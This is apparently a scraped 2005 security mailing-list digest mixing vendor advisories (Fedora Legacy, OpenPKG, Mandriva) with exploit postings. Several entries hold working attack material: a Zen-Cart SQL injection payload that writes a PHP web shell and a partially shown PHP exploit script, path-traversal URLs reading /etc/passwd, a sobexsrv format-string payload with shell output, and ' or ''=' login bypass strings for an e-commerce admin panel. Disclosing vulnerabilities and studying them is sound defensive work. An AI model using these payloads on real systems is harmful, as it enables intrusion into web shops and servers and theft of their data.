more MD5 colliding examples
hello everybody, last month we presented in a lightning talk at PacSec a few interesting and somehow new things related to MD5 collisions: 2 different Win32 .EXE files with the same MD5 hash, and 4 different files (inputs) with the same MD5 hash. These are direct results of reimplementing the already known attacks on MD5, specifically abusing the fact that collisions can be generated for arbitrary IVs. Today we are releasing some new stuff: - The 4 colliding files have been increased to 8 files (there is no real limit in the number of colliding files which can be generated, this is just an example of what can be done). - Two new Win32 .EXE files, this time with the same MD5 hash and also the same CRC32, the same checksum 32 and the same checksum 16. Of course all this is no big theoretical breakthrough, but it's somehow interesting to have examples to show to the incredulous. All the information (the files and presentation explaining how to regenerate the files) from PacSec is now available at http://www.corest.com/corelabs/projects/research_topics.php. have fun! gera
Zen-Cart <= 1.2.6d blind SQL injection / remote commands execution:
Zen-Cart <= 1.2.6d blind SQL injection / remote commands execution: software: site: http://www.zencart.com/ description:"Zen Cart truly is the art of e-commerce; a free,user-friendly, open source shopping cart system. The software is being developed by group of like-minded shop owners, programmers, designers, and consultants that think e-commerce could be and should be done differently.[..]" i) blind SQL INJECTION -> remote commmands/code execution vulnerable code in admin/password_forgotten.php: ... if (isset($_POST['submit'])) { if ( !$_POST['admin_email'] ) { $error_check = true; $email_message = ERROR_WRONG_EMAIL_NULL; } $admin_email = zen_db_prepare_input($_POST['admin_email']); $sql = "select admin_id, admin_name, admin_email, admin_pass from " . TABLE_ADMIN . " where admin_email = '" . $admin_email . "'"; ... if magic_quotes_gpc both on & off you can post an e-mail like this to create a shell: 'UNION SELECT 0,0,'',0 INTO OUTFILE '[full_application_path]shell.php' FROM admin/* so query become: select admin_id, admin_name, admin_email, admin_pass from admin where admin_email = ''UNION SELECT 0,0,'',0 INTO OUTFILE '[full_application_path]shell.php FROM admin/*' and after launch commands: http://[target]/[path]/shell.php?cmd=cat%20/etc/passwd this is my proof of concept exploit: http://rgod.altervista.org # # # # -> this works with magic_quotes_gpc both on & off # # # # usage: launch from Apache, fill in requested fields, then go! # # # # Sun-Tzu: "With his forces intact he will dispute the mastery# # of the Empire, and thus, without losing a man, his triumph # # will be complete. This is the method of attacking by stratagem."# error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 5); ob_implicit_flush (1); echo'Zen-Cart<=1.2.6d blind SQL injection/ remote cmmnds xctn body {background-color:#11; SCROLLBAR-ARROW-COLOR: #ff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img {background-color: #FF !important} input {background-color:#303030 !important} option { background-color: #303030 !important} textarea {background-color: #303030 !important} input {color: #1CB081 !important} option {color: #1CB081 !important} textarea {color: #1CB081 !important}checkbox {background-color: #303030 !important} select {font-weight: normal; color: #1CB081; background-color: #303030;} body {font-size: 8pt !important; background-color: #11; body * {font-size: 8pt !important} h1 {font-size: 0.8em !important} h2 {font-size: 0.8em!important} h3 {font-size: 0.8em !important} h4,h5,h6{font-size: 0.8em !important} h1 font {font-size: 0.8em !important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em !important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style: normal !important} *{text-decoration: none !important} a:link,a:active,a:visited { text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline; color : #33; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight:bold; font-style: italic;}--> Zen-Cart<=1.2.6d blind SQL injection/ remote cmmnds xctna script by rgod athttp://rgod.altervista.org"target="_blank";> http://rgod.altervista.org * hostname (ex:www.sitename.com) * path (ex: /zencart/ or just / ) * specify a command full application path (ex: "/www/zencart/", "../../www/zencart/","c:\www\zencart\" ), if not specified, we will try to disclose the path specify a port other than 80 ( default value ) sendexploit through an HTTP proxy (ip:port) '; function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo ''; while ($ii <= strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo " "; for ($li=0; $li<=15; $li++) { echo "".$headeri[$li+$ki].""; } $ki=$ki+16; echo ""; } if (strlen($datai)==1) {echo "0".$datai."";} else {echo "".$datai." ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo " "; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo "".$headeri[$li].""; } echo ""; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}
eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities
eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities http://www.phpbbstyles.com/ Description === These vulnerabilities could allow an attacker that has gained administrative access view file content on the system. 1. Remote File Content Disclosure === In xs_edit.php, the "edit" request field is not properly sanitized. 2. Full Path Disclosure === In xs_edit.php, the "viewbackup" request field is not properly sanitized. Proof of Concept 1. http://forum/admin/xs_edit.php?edit=../../../../etc/passwd 2. http://forum/admin/xs_edit.php?edit=&viewbackup=1 -- http://wtf.bz/
PHP-Fusion v6.00.109 SQL Injection and Info. Disclosure
In the latest version of PHP-Fusion, the content management system by Digitanium (php-fusion.co.uk), there is an SQL Error in messages.php that reveals path names and a table name, and someone could possibly manipulate the SQL database. The error is as follows, it is with the Search and Sort option: /messages.php?folder=inbox&srch_text=a&srch_type=blehblahbleh&sort_type=blahblehblah&srch_submit=Search%20/%20Sort The query above will give the following error (or something to the effect): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIKE 'a'' at line 1 Warning: mysql_result(): supplied argument is not a valid MySQL result resource in c:\WWW\removed\data\maincore.php on line 111 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIKE 'a'' at line 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIKE 'a' ORDER BY message_read, LIMIT 0,20' at line 1 Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in c:\WWW\removed\data\maincore.php on line 116 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIKE 'a' ORDER BY message_read, LIMIT 0,20' at line 1 The error could be used to obtain classified information about the database and the system, and is definitely manipulable. -Nolan West (CNS Chemist)
DMA[2005-1202a] - 'sobexsrv - Scripting/Secure OBEX Server format string vulnerability'
DMA[2005-1202a] - 'sobexsrv - Scripting/Secure OBEX Server format string vulnerability' Author: Kevin Finisterre Vendor: http://www.mulliner.org/bluetooth/sobexsrv.php Product: 'sobexsrv' References: http://www.digitalmunition.com/DMA[2005-1202a].txt http://www.mulliner.org/bluetooth/sobexsrv-1.0.0_pre3.tar.gz Description: The trifinite.blog is a weblog that is maintained by the trifinite.group. Every now and then you will find new entries there... Over Turkey Day I noticed a blog entry about a 'not really security related but very useful' Bluetooth application from the trifinite.group. There were actually two new applications but one jumped out at me right away. One of the apps needed hardware I did not have so I did not pay much attention to it, sobexsrv however seemed interesting. sobexsrv is a Bluetooth OBEX server with Bluetooth Security Mode-2 (application triggered security) support. It implements OPUSH (put), OPULL (get) and OBEX-FTP (setpath + directory listing) and therefore is a full OBEX server. sobexsrv was designed with flexibility and security in mind... Since I truely think Trifinite is pretty hardcore I almost didn't bother looking for bugs in this daemon. I pretty much assumed it would be rock solid. I figured if you can whisper at cars and shit you can certainly write an OBEX server. Being lazy I assumed that the examples from the man pages were easy enough to get me started using the sobexsrv. I quickly found that the first 2 man page examples can be used as examples for triggering a format string issue. EXAMPLES Simple setup using the internal mode, logging with syslog(8) and INBOX in /tmp. sobexsrv -IS -r /tmp Simple secure setup with chroot and Bluetooth security mode-2. sobexsrv -s 2 -ISR -l X -r /tmp In both examples shown above the -S option is used to enable syslog() logging. A format string issue was located almost immediately in the syslog support for the logging functions. Several instances of user input are passed to an unformatted syslog() call when using dosyslog(). [EMAIL PROTECTED]:~/sobexsrv-1.0.0_pre3$ grep syslog\( . -rin ./src/obexsrv.c:58: void dosyslog(char *m1, void *m2, void *m3) ./src/obexsrv.c:71: syslog(LOG_INFO, log); ... ./src/obexsrv.c:203:dosyslog("folder listing for \"%s\"\n", path, 0); ./src/obexsrv.c:290:if (ret) dosyslog("pulling \"%s\"\n", fullpath, 0); ./src/obexsrv.c:291:else dosyslog("failed pulling \"%s\"\n", fullpath, 0); ./src/obexsrv.c:334:if (ret) dosyslog("pushing \"%s\"\n", fullpath, 0); ./src/obexsrv.c:335:else dosyslog("faild pushing \"%s\"\n", fullpath, 0); ./src/obexsrv.c:356:if (ret) dosyslog("deleting \"%s\"\n", fullpath, 0); ./src/obexsrv.c:357:else dosyslog("failed deleting \"%s\"\n", fullpath, 0); ./src/obexsrv.c:401:dosyslog("created directory \"%s\"\n", fullpath, 0); ./src/obexsrv.c:406:dosyslog("failed to create directory \"%s\"\n", fullpath, 0); ... As an example I used a windows machine with the Widcomm bluetooth stack to create a folder named "--%19$x.%20$x" on a remote host. The My Bluetooth Places icon provides an OBEX ftp interface which worked perfect for a quick verification of the bug. Nov 24 04:24:40 sobexsrv: [00:0A:3A:54:71:95] connecting... Nov 24 04:24:40 sobexsrv: [00:0A:3A:54:71:95] connected Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] folder listing for "/tmp" Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] created directory "/tmp//---41414141.42424242" Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] disconnecting... Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] disconnected The host in this example is a PowerPC linux box so keep in mind that the x86 offsets will differ. This vulnerability is pretty trivial to exploit as shown below. We run the server in debug mode so that we can see what is going on a little better. Then we exploit it with a scripted ussp-push. [EMAIL PROTECTED]:~$ sobexsrv -ISd -r /home/kfinisterre/ security: mode = 1 REQHINT - add handler for this! CONNECT start CONNECT ok, result = 1 CONNECT end REQDONE REQHINT - add handler for this! PUT start PUT name: %1997.d%27$hn%76819.d%28$hnAAA AA AAA PUT length: 201 PUT body length: 201 PUT data_type 1 internal_handler: put for "/home/kfinisterre//%1997.d%27$hn%76819.d%28$hnAAA AA AAA" length=201 PUT ok PUT end REQDONE REQHINT - add handler for this! DISCONNECT start DISCONNECT end uid=1000(kfinisterre) gid=1000(kfinisterre) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(kfinisterr
QNX 4.25 suided dhcp.client binary
Hello all, I recently got a QNX 4.25 vmware image and i found that the dhcp.client shipped with it is suided. This obviously enables a normal user to control the NIC's configuration and produce some other attacks (eg: if the system has some services which depend on 'host/ip based' authentication [NFS,NIS,rlogin, etc]). Some vmware screenshots are available at: http://lms.ispgaya.pt/goodies/qnx/ I havent got access to other QNX installations so, allthough the person who gave me the image said the binary wasnt changed, can anybody else confirm this? Best regards, +- | Luís Miguel Ferreira da Silva | Unidade de Qualidade e Segurança | Centro de Informática | Professor Correia Araújo | Faculdade de Engenharia da | Universidade do Porto binDeU1K0xu0v.bin Description: PGP Public Key
[Updated] [FLSA-2005:166943] Updated php packages fix security issues
- Fedora Legacy Update Advisory Synopsis: Updated php packages fix security issues Advisory ID: FLSA:166943 Issue date:2005-12-02 Product: Red Hat Linux, Fedora Core Keywords: Bugfix CVE Names: CVE-2005-2498 CVE-2005-3390 CVE-2005-3389 CVE-2005-3388 CVE-2005-3353 - - 1. Topic: Updated PHP packages that fix multiple security issues are now available. PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server. [Updated 2nd December 2005] Red Hat Linux 9 packages have been updated to add missing security patches. 2. Relevant releases/architectures: Red Hat Linux 7.3 - i386 Red Hat Linux 9 - i386 Fedora Core 1 - i386 Fedora Core 2 - i386 3. Problem description: A bug was discovered in the PEAR XML-RPC Server package included in PHP. If a PHP script is used which implements an XML-RPC Server using the PEAR XML-RPC package, then it is possible for a remote attacker to construct an XML-RPC request which can cause PHP to execute arbitrary PHP commands as the 'apache' user. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-2498 to this issue. A flaw was found in the way PHP registers global variables during a file upload request. A remote attacker could submit a carefully crafted multipart/form-data POST request that would overwrite the $GLOBALS array, altering expected script behavior, and possibly leading to the execution of arbitrary PHP commands. Please note that this vulnerability only affects installations which have register_globals enabled in the PHP configuration file, which is not a default or recommended option. The Common Vulnerabilities and Exposures project assigned the name CVE-2005-3390 to this issue. A flaw was found in the PHP parse_str() function. If a PHP script passes only one argument to the parse_str() function, and the script can be forced to abort execution during operation (for example due to the memory_limit setting), the register_globals may be enabled even if it is disabled in the PHP configuration file. This vulnerability only affects installations that have PHP scripts using the parse_str function in this way. (CVE-2005-3389) A Cross-Site Scripting flaw was found in the phpinfo() function. If a victim can be tricked into following a malicious URL to a site with a page displaying the phpinfo() output, it may be possible to inject javascript or HTML content into the displayed page or steal data such as cookies. This vulnerability only affects installations which allow users to view the output of the phpinfo() function. As the phpinfo() function outputs a large amount of information about the current state of PHP, it should only be used during debugging or if protected by authentication. (CVE-2005-3388) A denial of service flaw was found in the way PHP processes EXIF image data. It is possible for an attacker to cause PHP to crash by supplying carefully crafted EXIF image data. (CVE-2005-3353) Users of PHP should upgrade to these updated packages, which contain backported patches that resolve these issues. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. To update all RPMs for your particular architecture, run: rpm -Fvh [filenames] where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs. Please note that this update is also available via yum and apt. Many people find this an easier way to apply updates. To use yum issue: yum update or to use apt: apt-get update; apt-get upgrade This will start an interactive process that will result in the appropriate RPMs being upgraded on your system. This assumes that you have yum or apt-get configured for obtaining Fedora Legacy content. Please visit http://www.fedoralegacy.org/docs for directions on how to configure yum and apt-get. 5. Bug IDs fixed: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=166943 6. RPMs required: Red Hat Linux 7.3: SRPM: http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/php-4.1.2-7.3.18.legacy.src.rpm i386: http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-4.1.2-7.3.18.legacy.i386.rpm http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-devel-4.1.2-7.3.18.legacy.i386.rpm http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-imap-4.1.2-7.3.18.legacy.i386.rpm http://download.fedoralegacy.org/redhat/7.3/updates/i386/php-ldap-4.1.2-7.3.18.legacy.i386.rpm http://download.fed
[OpenPKG-SA-2005.027] OpenPKG Security Advisory (php)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 OpenPKG Security AdvisoryThe OpenPKG Project http://www.openpkg.org/security.html http://www.openpkg.org [EMAIL PROTECTED] [EMAIL PROTECTED] OpenPKG-SA-2005.027 03-Dec-2005 Package: php Vulnerability: multiple ones OpenPKG Specific:no Affected Releases: Affected Packages: Corrected Packages: OpenPKG CURRENT <= php-4.4.0-20051004 >= php-4.4.1-20051031 OpenPKG 2.5 <= php-4.4.0-2.5.1 >= php-4.4.0-2.5.2 <= apache-1.3.33-2.5.3 >= apache-1.3.33-2.5.4 OpenPKG 2.4 <= php-4.3.11-2.4.1 >= php-4.3.11-2.4.2 <= apache-1.3.33-2.4.3 >= apache-1.3.33-2.4.4 OpenPKG 2.3 <= php-4.3.10-2.3.3 >= php-4.3.10-2.3.4 <= apache-1.3.33-2.3.5 >= apache-1.3.33-2.3.6 Description: Multiple vulnerabilities were recently found in the PHP [1] web scripting language: 1. The "exif_read_data" function in the EXIF module in PHP before 4.4.1 allows remote attackers to cause a Denial of Service (DoS) through an infinite recursion via a malformed JPEG image. The Common Vulnerabilities and Exposures (CVE) project assigned the id CVE-2005-3353 [2] to the problem. 2. A Cross-Site Scripting (XSS) vulnerability in the "phpinfo" function in PHP 4.x up to 4.4.0 and 5.x up to 5.0.5 allows remote attackers to inject arbitrary web script or HTML via a crafted URL with a "stacked array assignment". The Common Vulnerabilities and Exposures (CVE) project assigned the id CVE-2005-3388 [3] to the problem. 3. The "parse_str" function in PHP 4.x up to 4.4.0 and 5.x up to 5.0.5, when called with only one parameter, allows remote attackers to enable the "register_globals" directive via inputs that cause a request to be terminated due to the "memory_limit" setting, which causes PHP to set an internal flag that enables "register_globals" and allows attackers to exploit vulnerabilities in PHP applications that would otherwise be protected. The Common Vulnerabilities and Exposures (CVE) project assigned the id CVE-2005-3389 [4] to the problem. 4. The RFC1867 file upload feature in PHP 4.x up to 4.4.0 and 5.x up to 5.0.5, when "register_globals" is enabled, allows remote attackers to modify the "GLOBALS" array and bypass security protections of PHP applications via a "multipart/form-data" POST request with a "GLOBALS" "fileupload" field. The Common Vulnerabilities and Exposures (CVE) project assigned the id CVE-2005-3390 [5] to the problem. 5. Multiple vulnerabilities in PHP before 4.4.1 allow remote attackers to bypass "safe_mode" and "open_basedir" restrictions via unknown attack vectors in the "curl" and "gd" extensions. The Common Vulnerabilities and Exposures (CVE) project assigned the id CVE-2005-3391 [6] to the problem. 6. The additionally discovered issue CVE-2005-3392 doesn't affect PHP under the OpenPKG platforms. References: [1] http://www.php.net/ [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3353 [3] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3388 [4] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3389 [5] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3390 [6] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3391 For security reasons, this advisory was digitally signed with the OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F) of the OpenPKG project which you can retrieve from http://pgp.openpkg.org and hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org/ for details on how to verify the integrity of this advisory. -BEGIN PGP SIGNATURE- Comment: OpenPKG <[EMAIL PROTECTED]> iD8DBQFDkeIjgHWT4GPEy58RAr0kAKDI3vR3w7KhCg2iQ5h9au1LiYv2ogCdF4c7 IgeVMyxYVnQdAh6vmLP1kJE= =hdmj -END PGP SIGNATURE-
MDKSA-2005:222 - Updated mailman packages fix various vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2005:222 http://www.mandriva.com/security/ ___ Package : mailman Date: December 2, 2005 Affected: 10.1, 10.2, 2006.0, Corporate 3.0 ___ Problem Description: Scrubber.py in Mailman 2.1.4 - 2.1.6 does not properly handle UTF8 character encodings in filenames of e-mail attachments, which allows remote attackers to cause a denial of service. (CVE-2005-3573) In addition, these versions of mailman have an issue where the server will fail with an Overflow on bad date data in a processed message. The version of mailman in Corporate Server 2.1 does not contain the above vulnerable code. Updated packages are patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3573 ___ Updated Packages: Mandriva Linux 10.1: b62f2bdad4a9295bcedec597f5479843 10.1/RPMS/mailman-2.1.5-7.5.101mdk.i586.rpm 4ebd694b50ccbc9f2b602676840c4bc9 10.1/SRPMS/mailman-2.1.5-7.5.101mdk.src.rpm Mandriva Linux 10.1/X86_64: a887edf3dd65a418c441fae7588f7e5e x86_64/10.1/RPMS/mailman-2.1.5-7.5.101mdk.x86_64.rpm 4ebd694b50ccbc9f2b602676840c4bc9 x86_64/10.1/SRPMS/mailman-2.1.5-7.5.101mdk.src.rpm Mandriva Linux 10.2: 99e3dbde709dfa5eb7bd71041adf41be 10.2/RPMS/mailman-2.1.5-15.2.102mdk.i586.rpm c01867687ff9c78b4c1e2da9d70c4f11 10.2/SRPMS/mailman-2.1.5-15.2.102mdk.src.rpm Mandriva Linux 10.2/X86_64: c66dd1916ba0d8ecf8796b1890a064fd x86_64/10.2/RPMS/mailman-2.1.5-15.2.102mdk.x86_64.rpm c01867687ff9c78b4c1e2da9d70c4f11 x86_64/10.2/SRPMS/mailman-2.1.5-15.2.102mdk.src.rpm Mandriva Linux 2006.0: f917270b5334f62843bbdb4a06d12ae0 2006.0/RPMS/mailman-2.1.6-6.2.20060mdk.i586.rpm 15bc0be9373657ac39a9e3956de90801 2006.0/SRPMS/mailman-2.1.6-6.2.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: e92b1dd1ae0bfe3bbc61ba5d6f3b52c3 x86_64/2006.0/RPMS/mailman-2.1.6-6.2.20060mdk.x86_64.rpm 15bc0be9373657ac39a9e3956de90801 x86_64/2006.0/SRPMS/mailman-2.1.6-6.2.20060mdk.src.rpm Corporate 3.0: 867bdc1fe018e94eb4d5352fc69747ae corporate/3.0/RPMS/mailman-2.1.4-2.5.C30mdk.i586.rpm 572477eb207dadbabc22b0e53b0c2b2b corporate/3.0/SRPMS/mailman-2.1.4-2.5.C30mdk.src.rpm Corporate 3.0/X86_64: 8a4cc67f45481e9d4b25c41e80f54809 x86_64/corporate/3.0/RPMS/mailman-2.1.4-2.5.C30mdk.x86_64.rpm 572477eb207dadbabc22b0e53b0c2b2b x86_64/corporate/3.0/SRPMS/mailman-2.1.4-2.5.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFDkKPamqjQ0CJFipgRAli4AKCLkrxtdpNyvYclD5KxuVVAZFAHCgCgw0NO Uq5wc0mG0ABsi0Kyn7l6xR0= =e/3r -END PGP SIGNATURE-
Re: WebCalendar
Hi, Dan: For some vulnerability has fixed by the vendor, I have update this vulnerability advisory, sorry for any trouble I have caused to you. The following is the updated advisory.: === WebCalendar CRLF Injection Vulnerability I. BACKGROUND WebCalendar is a PHP application used to maintain a calendar for one or more persons and for a variety of purposes. II. DESCRIPTION CRLF injection vulnerability in WebCalendar layers_toggle.php allows remote attackers to inject false HTTP headers into an HTTP request, via a URL containing encoded carriage return, line feed, and other whitespace characters. III. PUBLISH DATE Publish Date: 2005-12-1 Update Date: 2005-12-2 IV. AUTHOR lwang (lwang at lwang dot org) V. AFFECTED SOFTWARE WebCalendar version 1.0.1 and 1.1.0 are affected. Older versions are not verified. VI. ANALYSIS in layers_toggle.php, parameter $ret does not validation. if ( empty ( $error ) ) { // Go back to where we where if we can figure it out. if ( strlen ( $ret ) ) do_redirect ( $ret ); else if ( ! empty ( $HTTP_REFERER ) ) do_redirect ( $HTTP_REFERER ); else send_to_preferred_view (); Proof of Concept: http://victim/webcalendar/layers_toggle.php?status=on&ret=[url_redirect_to] VII. SOLUTION Input validation will fix the bug. VIII. ADVISORY http://vd.lwang.org/webcalendar_crlf_injection.txt VIII. REFERENCE http://www.k5n.us/webcalendar.php On 12/2/05, Daniel Bertrand <[EMAIL PROTECTED]> wrote: > > Hi, > > What is the vendor web site for this application? I need this information > to write up this BID. > > Regards, > > Dan B. > > > > -- Regards, Bill Louis
Alisveristr E-Commerce Admin Login SQL İnjection
###Hi all ###B3g0k[at]hackermail.com ###Kurdish Hacker ###Special Thanx All Kurdish Hackers ###Freedom For Ocalan!!! ###--- ###Alisveristr E-commerce User Login Sql İnjection ###Alisveristr E-commerce Admin Login Sql ###İnjection ###--- ###Site: http://www.alisveristr.com or ###http://www.alisveris-tr.com ### ###Description: A E-Commerce scirpt it is too ###cool... :) User login Sql İnjection: Code 1 For User Login : Username : ' or ''=' Password: ' or ''=' Another User Login Sql İnjecition Username : ' or 'a'='a Password : ' or 'a'='a -- Now Admin login Sql injectoin ex: http://site.com/yonetim/default.asp http://www.alisveristr.com/yonetim http://www.alisveris-tr.com/yonetim Code 1 For Admin Login Username : ' or ''=' Password : ' or ''=' Code 2 For Admin Login : Username : ' or 'a'='a Password : ' or 'a'='a Thats it. Contact : [EMAIL PROTECTED] Kurdish Hacker
[OpenPKG-SA-2005.025] OpenPKG Security Advisory (perl)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 OpenPKG Security AdvisoryThe OpenPKG Project http://www.openpkg.org/security.html http://www.openpkg.org [EMAIL PROTECTED] [EMAIL PROTECTED] OpenPKG-SA-2005.025 03-Dec-2005 Package: perl Vulnerability: integer overflow, arbitrary code execution OpenPKG Specific:no Affected Releases: Affected Packages: Corrected Packages: OpenPKG CURRENT <= perl-5.8.7-20050921 >= perl-5.8.7-20051203 OpenPKG 2.5 <= perl-5.8.7-2.5.0 >= perl-5.8.7-2.5.1 OpenPKG 2.4 <= perl-5.8.7-2.4.0 >= perl-5.8.7-2.4.1 OpenPKG 2.3 <= perl-5.8.6-2.3.0 >= perl-5.8.6-2.3.1 Description: According to a security advisory from Dyad Security [0], an integer overflow bug exists in the Perl [1] programming language. The integer overflow is in the format string functionality (Perl_sv_vcatpvfn) of Perl and allows attackers to overwrite arbitrary memory and possibly execute arbitrary code via format string specifiers with large values. The Common Vulnerabilities and Exposures (CVE) project assigned the id CVE-2005-3962 [2] to the problem. References: [0] http://www.dyadsecurity.com/perl-0002.html [1] http://www.perl.org/ [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3962 For security reasons, this advisory was digitally signed with the OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F) of the OpenPKG project which you can retrieve from http://pgp.openpkg.org and hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org/ for details on how to verify the integrity of this advisory. -BEGIN PGP SIGNATURE- Comment: OpenPKG <[EMAIL PROTECTED]> iD8DBQFDkZxrgHWT4GPEy58RAikXAKCUQaaaYqxG3+QTRQtNVL5YLXvaMgCdGZqn MTL3qjtRNoCw7vT6iRUDRs8= =jRTP -END PGP SIGNATURE-
eXtreme Styles mod <= 2.2.1 Multiple Vulnerabilities
Site: http://www.phpbbstyles.com/ 1. Remote File Content Disclosure http://forum/admin/xs_edit.php?edit=../../../../etc/passwd 2. Full Path Disclosure http://forum/admin/xs_edit.php?edit=&viewbackup=1 http://wtf.bz/
Re: Re: Microsoft Windows CreateRemoteThread Exploit
You are a bit wrong q7x some firewalls and security programs will stop you from calling that function(and some others like that), for example the Tiny Personal Firewall.
MDKSA-2005:221 - Updated spamassassin packages fixes vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2005:221 http://www.mandriva.com/security/ ___ Package : spamassassin Date: December 2, 2005 Affected: 10.1, 10.2, 2006.0 ___ Problem Description: SpamAssassin 3.0.4 allows attackers to bypass spam detection via an e-mail with a large number of recipients ("To" addresses), which triggers a bus error in Perl. Updated packages have been patched to address this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3351 ___ Updated Packages: Mandriva Linux 10.1: bef6bc710a84e631fdd4d4f94a86248c 10.1/RPMS/perl-Mail-SpamAssassin-3.0.4-0.2.101mdk.i586.rpm 6c3246d2e9860379b267593fbdd2be74 10.1/RPMS/spamassassin-3.0.4-0.2.101mdk.i586.rpm 75171a7044be3d193e2f9979fd991e62 10.1/RPMS/spamassassin-spamc-3.0.4-0.2.101mdk.i586.rpm 20f74aae0c01c0819fc0d686a2967979 10.1/RPMS/spamassassin-spamd-3.0.4-0.2.101mdk.i586.rpm 095c5d7c16b74e4004bf731c427c9b0f 10.1/RPMS/spamassassin-tools-3.0.4-0.2.101mdk.i586.rpm c605bdcc9ac46522efaeca7e12c80949 10.1/SRPMS/spamassassin-3.0.4-0.2.101mdk.src.rpm Mandriva Linux 10.1/X86_64: 18805a860661de486a7ae0a716823da2 x86_64/10.1/RPMS/perl-Mail-SpamAssassin-3.0.4-0.2.101mdk.x86_64.rpm 3fd255f3e04fc2b4380063a9b4ca7403 x86_64/10.1/RPMS/spamassassin-3.0.4-0.2.101mdk.x86_64.rpm 208127aaeb59bb39b9711b4e260fd47c x86_64/10.1/RPMS/spamassassin-spamc-3.0.4-0.2.101mdk.x86_64.rpm 21c05e1003d08a3a9b869971d713c6a7 x86_64/10.1/RPMS/spamassassin-spamd-3.0.4-0.2.101mdk.x86_64.rpm 086b1cb83ee2f4343116bbece2b37261 x86_64/10.1/RPMS/spamassassin-tools-3.0.4-0.2.101mdk.x86_64.rpm c605bdcc9ac46522efaeca7e12c80949 x86_64/10.1/SRPMS/spamassassin-3.0.4-0.2.101mdk.src.rpm Mandriva Linux 10.2: cc43a9f882ef5a1e20d587d961db8d1a 10.2/RPMS/perl-Mail-SpamAssassin-3.0.4-0.2.102mdk.i586.rpm a42113eae2989be9d3af932338535c5d 10.2/RPMS/spamassassin-3.0.4-0.2.102mdk.i586.rpm f294a8ebb83ec6245ee4cb477f01510a 10.2/RPMS/spamassassin-spamc-3.0.4-0.2.102mdk.i586.rpm d017ebbbe4778c147dcc9903473aa092 10.2/RPMS/spamassassin-spamd-3.0.4-0.2.102mdk.i586.rpm bb699d1b5875a53b5daace54ef544d20 10.2/RPMS/spamassassin-tools-3.0.4-0.2.102mdk.i586.rpm eec76ea982c797aaa1b18f6b1c35471c 10.2/SRPMS/spamassassin-3.0.4-0.2.102mdk.src.rpm Mandriva Linux 10.2/X86_64: dccacca323368a74af5af12392e1486c x86_64/10.2/RPMS/perl-Mail-SpamAssassin-3.0.4-0.2.102mdk.x86_64.rpm d104a1c344b1616a881e29e8b4cb495c x86_64/10.2/RPMS/spamassassin-3.0.4-0.2.102mdk.x86_64.rpm 410ce462bf261c2e1c73cff6eefa4517 